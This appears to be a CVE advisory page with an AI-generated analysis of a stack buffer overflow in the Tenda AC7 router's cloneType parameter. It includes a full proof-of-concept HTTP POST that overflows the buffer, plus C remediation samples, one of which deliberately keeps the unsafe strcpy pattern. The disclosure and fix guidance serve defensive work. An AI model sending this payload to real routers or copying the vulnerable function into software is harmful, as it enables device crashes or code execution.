VYPR
Unrated severity · NVD Advisory · Published Jun 19, 2026 · Updated Jun 19, 2026

CVE-2026-51844

Description

Tenda AC7 v15.03.06.44 contains a stack buffer overflow vulnerability in the /goform/AdvSetMacMtuWan interface via the cloneType parameter.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

1

Vulnerability mechanics

Root cause

"The check_param_changed method uses strcpy to copy the user-controlled cloneType parameter into a fixed stack buffer without bounds checking, causing a stack buffer overflow."

Attack vector

An attacker on the same LAN as the Tenda AC7 router sends a crafted HTTP POST request to `/goform/AdvSetMacMtuWan` with an oversized `cloneType` parameter. The `check_param_changed` method copies this user-controlled input into a fixed stack buffer using `strcpy`, which performs no bounds checking. When the input exceeds the buffer capacity, a stack buffer overflow occurs [ref_id=1]. This can lead to denial of service or, with carefully crafted malicious data, remote arbitrary code execution [ref_id=1].

What the fix does

The advisory does not include a patch or vendor fix. The recommended remediation is to replace the unbounded `strcpy` call with a bounded copy function (e.g., `strncpy` or `snprintf`) that checks the destination buffer size, or to validate the length of the `cloneType` parameter before copying it onto the stack [ref_id=1]. Without such a change, the overflow remains exploitable.
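The remediation options named above, as an added C example that is neither the vendor's firmware code nor code from the advisory. The 16-byte buffer size and every function name are assumptions, since the advisory states neither the real buffer length nor the handler's source.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size: the advisory does not give the real buffer length. */
#define CLONE_TYPE_BUF 16

/* Pattern the advisory describes: unbounded strcpy into a stack buffer.
 * Kept for comparison; memory-safe only if strlen(v) < CLONE_TYPE_BUF. */
int set_clone_type_unbounded(const char *v) {
    char buf[CLONE_TYPE_BUF];
    strcpy(buf, v);                        /* no length check */
    return (int)strlen(buf);
}

/* Validate-then-copy: returns 0 on success, -1 if v does not fit. */
int copy_checked(char *dst, size_t dst_size, const char *v) {
    if (!dst || !v || dst_size == 0) return -1;
    size_t n = 0;
    while (n < dst_size && v[n] != '\0') n++;      /* reads at most dst_size bytes */
    if (n == dst_size) { dst[0] = '\0'; return -1; } /* too long: copy nothing */
    memcpy(dst, v, n + 1);                         /* n + 1 <= dst_size, includes NUL */
    return 0;
}

/* snprintf variant: truncation shows up as a return value >= dst_size. */
int copy_snprintf(char *dst, size_t dst_size, const char *v) {
    if (!dst || !v || dst_size == 0) return -1;
    int n = snprintf(dst, dst_size, "%s", v);
    if (n < 0 || (size_t)n >= dst_size) { dst[0] = '\0'; return -1; }
    return 0;
}

/* strncpy alone does not NUL-terminate a full buffer; terminate explicitly.
 * Returns 1 if the value was truncated, 0 if it fit, -1 on bad arguments. */
int copy_strncpy(char *dst, size_t dst_size, const char *v) {
    if (!dst || !v || dst_size == 0) return -1;
    strncpy(dst, v, dst_size - 1);
    dst[dst_size - 1] = '\0';
    return strlen(v) >= dst_size;
}

/* Hypothetical handler: reject an oversized cloneType instead of copying it. */
int set_clone_type_bounded(const char *v) {
    char buf[CLONE_TYPE_BUF];
    if (copy_checked(buf, sizeof buf, v) != 0) return -1;
    return (int)strlen(buf);
}
```

Rejecting the oversized value is usually preferable to silent truncation for a configuration field, because a truncated value can still be stored and acted on.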

Preconditions

  • network: Attacker must be on the same LAN as the router (able to reach 192.168.0.1)
  • auth: No authentication bypass required; the PoC includes a valid cookie
  • input: Attacker sends a POST request with an oversized cloneType parameter

Reproduction

POST /goform/AdvSetMacMtuWan HTTP/1.1
Host: 192.168.0.1
Content-Length: 715
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Origin: http://192.168.0.1
Referer: http://192.168.0.1/mac_clone.html?random=0.6216016377171282&
Accept-Encoding: gzip, deflate, br
Cookie: password=yzu1qw
Connection: keep-alive

wanMTU=1500&wanSpeed=0&cloneType=1AAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAA1AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&mac=B4:0F:3B:2E:64:19

Generated on Jun 20, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

1
